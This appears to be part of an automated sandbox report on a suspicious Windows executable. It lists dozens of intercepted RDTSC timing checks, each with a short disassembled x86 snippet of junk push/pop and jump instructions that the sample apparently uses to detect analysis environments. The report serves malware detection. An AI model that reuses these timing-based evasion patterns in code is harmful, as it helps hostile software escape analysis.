                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28E6B2 second address: 28E6B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 290595 second address: 2905AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05491602DEh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 290666 second address: 29066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28F81B second address: 28F820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 28F820 second address: 28F827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2945E6 second address: 29462F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], eax 0x0000000b sub edi, 70349985h 0x00000011 push 00000000h 0x00000013 mov bx, di 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F05491602D8h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 push eax 0x00000033 pushad 0x00000034 jbe 00007F05491602D8h 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 29462F second address: 294633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 294633 second address: 294637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2938A6 second address: 2938AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 292840 second address: 292844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 292844 second address: 29284A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2938AB second address: 2938D0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05491602D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F05491602E4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 29284A second address: 292850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2938D0 second address: 2938ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05491602E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 291826 second address: 291830 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 292850 second address: 292854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2947E1 second address: 2947E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 292854 second address: 2928CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bh, 49h 0x0000000d mov di, 46C2h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov dword ptr [ebp+1246FF8Eh], eax 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F05491602D8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f jnc 00007F05491602D7h 0x00000045 or bh, FFFFFF8Bh 0x00000048 mov eax, dword ptr [ebp+122D0095h] 0x0000004e movzx ebx, bx 0x00000051 push FFFFFFFFh 0x00000053 sbb di, A152h 0x00000058 call 00007F05491602DCh 0x0000005d cld 0x0000005e pop ebx 0x0000005f nop 0x00000060 push ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 jns 00007F05491602D6h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2928CE second address: 2928F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0549119948h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2928F4 second address: 2928F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 29488B second address: 294891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 294891 second address: 294895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2956B8 second address: 2956CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119941h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2956CD second address: 2956E0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F05491602D8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 29671A second address: 296799 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F0549119947h 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov dword ptr [ebp+12468036h], edx 0x00000017 push 00000000h 0x00000019 jne 00007F0549119942h 0x0000001f jno 00007F0549119936h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F0549119938h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Dh 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov ebx, 7640CD10h 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007F054911993Ah 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 296799 second address: 29679E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 29679E second address: 2967CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0549119944h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F054911993Fh 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2967CE second address: 2967D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2967D4 second address: 2967D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 297868 second address: 29786C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 29786C second address: 297876 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 296A65 second address: 296A6F instructions: 0x00000000 rdtsc 0x00000002 js 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 296A6F second address: 296A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 296A75 second address: 296A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 298863 second address: 298868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2979E6 second address: 2979EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2979EB second address: 2979F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DDF55 second address: 2DDF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DE278 second address: 2DE28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jnp 00007F0549119936h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DE28A second address: 2DE290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DE290 second address: 2DE298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DE298 second address: 2DE29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2DE29E second address: 2DE2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0549119945h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E3390 second address: 2E3398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E3398 second address: 2E33A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0549119936h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E33A7 second address: 2E33AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E33AB second address: 2E33D4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F054911993Dh 0x00000012 jmp 00007F054911993Fh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E2834 second address: 2E283C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E283C second address: 2E2842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E2842 second address: 2E2846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E2846 second address: 2E2876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F054911993Ch 0x00000010 jl 00007F0549119936h 0x00000016 jnl 00007F054911994Ah 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E2DB4 second address: 2E2DD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F05491602E2h 0x00000010 jl 00007F05491602D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E3075 second address: 2E3083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E3083 second address: 2E3087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E3087 second address: 2E308D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E308D second address: 2E3093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2E78EA second address: 2E78FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F0549119936h 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EEDF5 second address: 2EEDFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EEDFA second address: 2EEE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EEE00 second address: 2EEE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602DCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EF87B second address: 2EF888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F0549119936h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EFB58 second address: 2EFB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EFB5E second address: 2EFB64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2EE8E6 second address: 2EE8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602DAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2F65AF second address: 2F65B9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2F65B9 second address: 2F65BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 2F61C3 second address: 2F61C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3065CA second address: 3065D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3065D1 second address: 3065E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 306052 second address: 306056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 306056 second address: 306078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F054911993Dh 0x0000000b pop edx 0x0000000c jng 00007F0549119957h 0x00000012 je 00007F0549119951h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3061F0 second address: 3061F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3080E7 second address: 3080EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 30EBAF second address: 30EBC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 30EBC5 second address: 30EBDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F054911993Eh 0x0000000b popad 0x0000000c push ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 30EBDE second address: 30EBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 317D29 second address: 317D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F0549119936h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 317D3A second address: 317D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 31CACD second address: 31CAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 22C889 second address: 22C89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F05491602DBh 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3226FC second address: 322700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 322EDB second address: 322EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 322EE1 second address: 322EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 322EE5 second address: 322EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 322EE9 second address: 322EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 323A9A second address: 323AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 323AA4 second address: 323AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 323AAE second address: 323AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 3293FC second address: 329407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0549119936h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 337A15 second address: 337A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 339DA6 second address: 339DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B697 second address: 33B6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F05491602D6h 0x0000000a jmp 00007F05491602E2h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B6B9 second address: 33B6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 33B6BD second address: 33B6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
